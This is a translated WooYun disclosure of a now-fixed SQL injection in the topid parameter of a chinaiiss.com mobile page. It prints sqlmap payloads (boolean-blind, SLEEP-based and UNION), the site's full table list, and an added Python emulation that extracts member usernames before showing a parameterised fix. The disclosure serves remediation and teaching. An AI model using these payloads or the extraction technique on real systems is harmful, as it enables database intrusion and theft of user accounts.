
Vulnerability summary

Defect ID: wooyun-2015-0144729

Title: A site of 中国战略网 (chinaiiss.com) has a SQL injection that allows UNION queries (about 690,000 account records involved)

Vendor: chinaiiss.com

Author: 路人甲

Submitted: 2015-10-04 16:13

Fixed: 2015-10-09 10:56

Published: 2015-10-09 10:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-04: Details sent to the vendor, awaiting vendor action
2015-10-08: Vendor confirmed the issue; details visible to the vendor only
2015-10-09: Vendor fixed the vulnerability and chose to publish; details now public

Brief description:

Detailed description:

http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch   Injection point: the topid GET parameter

[Screenshot: 11.jpg]

The cis database (sqlmap output):

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND 8593=8593&vtype=touch
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZEyk)&vtype=touch
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 UNION ALL SELECT CONCAT(0x7178766a71,0x76596154616954595344,0x7178787671),NULL,NULL,NULL,NULL-- &vtype=touch
---
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
Database: cis
[227 tables]
+-------------------------------+
| forum_remark |
| iiss_admin |
| iiss_adminsession |
| iiss_admintype |
| iiss_answer |
| iiss_article |
| iiss_article_hezuo |
| iiss_article_sendmail |
| iiss_article_special |
| iiss_article_specialfield |
| iiss_articlefield |
| iiss_articlemodify |
| iiss_articlerelated |
| iiss_attachment |
| iiss_banned |
| iiss_blogger_iprecord |
| iiss_blogger_vote |
| iiss_bottom |
| iiss_clickcount |
| iiss_clickinfo |
| iiss_clicklocation |
| iiss_clickrecord |
| iiss_conference |
| iiss_conference_author_praise |
| iiss_conference_candidate |
| iiss_conference_praise_record |
| iiss_conference_user_medal |
| iiss_contest |
| iiss_contest_question |
| iiss_contest_record |
| iiss_contest_userquestion |
| iiss_contest_userscore |
| iiss_country |
| iiss_country_area |
| iiss_datatype |
| iiss_day |
| iiss_defense_elite |
| iiss_delrecord |
| iiss_downimage |
| iiss_facecount |
| iiss_figure |
| iiss_figure_character |
| iiss_figure_impression |
| iiss_figure_year |
| iiss_file_attachment |
| iiss_guestbook |
| iiss_hero |
| iiss_hire |
| iiss_history_today |
| iiss_hours |
| iiss_hours2 |
| iiss_image |
| iiss_image_comic |
| iiss_imagefield |
| iiss_index_accesslog |
| iiss_infocategory |
| iiss_infocomment |
| iiss_infomodel |
| iiss_jump |
| iiss_leader |
| iiss_links |
| iiss_links_record |
| iiss_linkscooper |
| iiss_linkstype |
| iiss_list_accesslog |
| iiss_livetelecast |
| iiss_livetelecast_article |
| iiss_member |
| iiss_member_failedlogins |
| iiss_member_field |
| iiss_member_recommend |
| iiss_member_verifycode |
| iiss_member_verifycode2 |
| iiss_milarea |
| iiss_milcontrast |
| iiss_milcountry |
| iiss_milcountryelse |
| iiss_mobile_apps |
| iiss_mobile_article |
| iiss_mobile_conference |
| iiss_mobile_image |
| iiss_mobile_manual |
| iiss_mobile_pk |
| iiss_mobile_version |
| iiss_mobile_wallpaper |
| iiss_navi |
| iiss_people |
| iiss_perspective |
| iiss_perspectivefield |
| iiss_pk |
| iiss_pkvote |
| iiss_pkvoteuser |
| iiss_promotion_iprecord |
| iiss_promotionlink |
| iiss_promotionstatistics |
| iiss_question |
| iiss_quick_member |
| iiss_review_record |
| iiss_session |
| iiss_sethome |
| iiss_spec_baodiaovote |
| iiss_spec_baodiaovotetotal |
| iiss_spec_nanhai |
| iiss_spec_qiongdingzhixia |
| iiss_spec_seekones |
| iiss_special |
| iiss_special_foruminfo |
| iiss_spiderpic |
| iiss_sysdata |
| iiss_table |
| iiss_tag |
| iiss_tagart |
| iiss_tagartspec |
| iiss_taghero |
| iiss_tagimg |
| iiss_tagperspective |
| iiss_tagsend |
| iiss_updatearticle |
| iiss_userquestion |
| iiss_viewrecord_201002 |
| iiss_viewrecord_201003 |
| iiss_viewrecord_201004 |
| iiss_viewrecord_201005 |
| iiss_viewrecord_201006 |
| iiss_viewrecord_201007 |
| iiss_viewrecord_201008 |
| iiss_viewrecord_201009 |
| iiss_viewrecord_201010 |
| iiss_viewrecord_201011 |
| iiss_viewrecord_201012 |
| iiss_viewrecord_201101 |
| iiss_viewrecord_201102 |
| iiss_viewrecord_201103 |
| iiss_viewrecord_201104 |
| iiss_viewrecord_201105 |
| iiss_viewrecord_201106 |
| iiss_viewrecord_201107 |
| iiss_viewrecord_201108 |
| iiss_viewrecord_201109 |
| iiss_viewrecord_201110 |
| iiss_viewrecord_201111 |
| iiss_viewrecord_201112 |
| iiss_viewrecord_201201 |
| iiss_viewrecord_201202 |
| iiss_viewrecord_201203 |
| iiss_viewrecord_201204 |
| iiss_viewrecord_201205 |
| iiss_viewrecord_201206 |
| iiss_viewrecord_201207 |
| iiss_viewrecord_201208 |
| iiss_viewrecord_201209 |
| iiss_viewrecord_201210 |
| iiss_viewrecord_201211 |
| iiss_viewrecord_201212 |
| iiss_viewrecord_201301 |
| iiss_viewrecord_201302 |
| iiss_viewrecord_201303 |
| iiss_viewrecord_201304 |
| iiss_viewrecord_201305 |
| iiss_viewrecord_201306 |
| iiss_viewrecord_201307 |
| iiss_viewrecord_201308 |
| iiss_viewrecord_201309 |
| iiss_viewrecord_201310 |
| iiss_viewrecord_201311 |
| iiss_viewrecord_201312 |
| iiss_viewrecord_201401 |
| iiss_viewrecord_201402 |
| iiss_viewrecord_201403 |
| iiss_viewrecord_201404 |
| iiss_viewrecord_201405 |
| iiss_viewrecord_201406 |
| iiss_viewrecord_201407 |
| iiss_viewrecord_201408 |
| iiss_viewrecord_201409 |
| iiss_viewrecord_201410 |
| iiss_viewrecord_201411 |
| iiss_viewrecord_201412 |
| iiss_viewrecord_201501 |
| iiss_viewrecord_201502 |
| iiss_viewrecord_201503 |
| iiss_viewrecord_201504 |
| iiss_viewrecord_201505 |
| iiss_viewrecord_201506 |
| iiss_viewrecord_201507 |
| iiss_viewrecord_201508 |
| iiss_viewrecord_201509 |
| iiss_viewrecord_201510 |
| iiss_viewrecord_day |
| iiss_viewrecord_daybysite |
| iiss_voice |
| iiss_voice_news |
| iiss_vote |
| iiss_votetype |
| iiss_voteuser |
| iiss_wap_article |
| iiss_wap_image |
| iiss_wap_pk |
| iiss_weaponspec |
| iiss_weibo_activeusers |
| iiss_weibo_friendships |
| iiss_weibo_repost |
| iiss_weibo_repostrecord |
| iiss_weibo_repostusers_record |
| iiss_weibo_tokenuser |
| iiss_weibo_users |
| iiss_wikipedia |
| iiss_wikipediaedition |
| iiss_wikipediafield |
| iiss_worship |
| iiss_writer |
| iiss_writerart |
| iiss_writerartfield |
| iiss_yearvoterecord |
| iissblog_album |
| iissblog_blog |
| iissblog_blog2 |
| iissblog_class |
| iissblog_comment |
| iissblog_favorites |
| iissblog_feed |
| iissblog_log |
| iissblog_pic |
| iissblog_pic_favorites |
| iissblog_user |
| iissblog_user_20140806 |
| iissblog_viewnum |
+-------------------------------+
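The three techniques sqlmap lists above (boolean-based blind, time-based blind, UNION) all follow from one defect: the numeric topid value is spliced into the SQL text instead of being bound as a parameter. The block below is an added example, not code from the report or from chinaiiss.com. It emulates that defect against an in-memory SQLite database standing in for the MySQL cis database, shows why the page's boolean and UNION payloads work, and shows the parameterised query that stops them. The table names iiss_article and iiss_member are taken from the table list above; their columns, rows, hash values and the query shape are constructed assumptions. The time-based payload is not emulated because SQLite has no SLEEP(), and SQLite's || replaces MySQL's CONCAT().

```python
# Added example, not code from the WooYun report or from chinaiiss.com. It emulates
# the reported defect with an in-memory SQLite database standing in for the MySQL
# "cis" database: an integer GET parameter (topid) is spliced into the SQL text.
# The iiss_article / iiss_member table names come from the page's table list; their
# columns, rows, and the query shape are constructed assumptions for illustration.
import sqlite3

# ASCII of the sqlmap marker bytes in the page's UNION payload:
# 0x7178766a71 -> "qxvjq", 0x7178787671 -> "qxxvq". sqlmap wraps each extracted
# value in these so it can locate it in an arbitrary response body.
MARK_L, MARK_R = "qxvjq", "qxxvq"


def build_db():
    """Construct the stand-in database (schema and rows are assumptions)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE iiss_article (id INTEGER, topid INTEGER, title TEXT, body TEXT, author TEXT)"
    )
    con.executemany(
        "INSERT INTO iiss_article VALUES (?,?,?,?,?)",
        [(1, 4, "Article A", "...", "editor"),
         (2, 4, "Article B", "...", "editor"),
         (3, 5, "Article C", "...", "editor")],
    )
    con.execute("CREATE TABLE iiss_member (uid INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO iiss_member VALUES (?,?,?)",
        [(1, "admin", "e10adc3949ba59abbe56e057f20f883e"),   # constructed sample hashes
         (2, "alice", "25d55ad283aa400af464c76d713c07ad"),
         (3, "bob", "5f4dcc3b5aa765d61d8327deb882cf99")],
    )
    con.commit()
    return con


def vulnerable_query(con, topid):
    """The pattern that lets sqlmap succeed: topid spliced straight into the SQL text.
    Five selected columns match the 'Generic UNION query (NULL) - 5 columns' finding."""
    sql = f"SELECT id, topid, title, body, author FROM iiss_article WHERE topid={topid}"
    return con.execute(sql).fetchall()


def hardened_query(con, topid):
    """Fix: validate the type, then bind the value as a parameter, never as SQL text."""
    if not isinstance(topid, str) or not topid.isdigit():
        raise ValueError("topid must be a decimal integer")
    sql = "SELECT id, topid, title, body, author FROM iiss_article WHERE topid=?"
    return con.execute(sql, (int(topid),)).fetchall()


def boolean_blind_confirms(con):
    """sqlmap's boolean-based check from the page: 'AND 8593=8593' must leave the
    response unchanged, while a false predicate must empty it."""
    baseline = vulnerable_query(con, "4")
    true_case = vulnerable_query(con, "4 AND 8593=8593")
    false_case = vulnerable_query(con, "4 AND 8593=8594")
    return baseline != [] and true_case == baseline and false_case == []


def union_extract(con, table, column):
    """The UNION technique from the page, used to pull one column out of any table.
    SQLite uses || where MySQL uses CONCAT(); the marker/NULL layout is the same."""
    payload = (f"4 UNION ALL SELECT '{MARK_L}'||{column}||'{MARK_R}',NULL,NULL,NULL,NULL "
               f"FROM {table}-- ")
    values = []
    for row in vulnerable_query(con, payload):
        first = row[0]
        # Only rows carrying both markers are injected rows; article rows have an int here.
        if isinstance(first, str) and first.startswith(MARK_L) and first.endswith(MARK_R):
            values.append(first[len(MARK_L):-len(MARK_R)])
    return values


def hardened_rejects(con, payload):
    """True when the hardened endpoint refuses the payload outright."""
    try:
        hardened_query(con, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("boolean-blind confirmed:", boolean_blind_confirms(db))
    print("usernames via UNION:", union_extract(db, "iiss_member", "username"))
    print("hardened rejects UNION payload:",
          hardened_rejects(db, "4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- "))
```

The hardened version does two things, and both matter: the isdigit() check means an attacker cannot even reach the database with anything but a decimal integer, and the bound parameter means that even if validation were later loosened, the value could never be parsed as SQL. Casting alone (intval() in PHP) would also have stopped this particular numeric injection, but a bound parameter is the fix that survives a change of the parameter to a string type.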

About 690,000 accounts:

[Screenshots: 12.png, 13.png]

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-10-08 23:54

Vendor reply:

Thanks for your support

Latest status:

2015-10-09: Fixed, thanks for your support

2015-10-09: Thanks for your support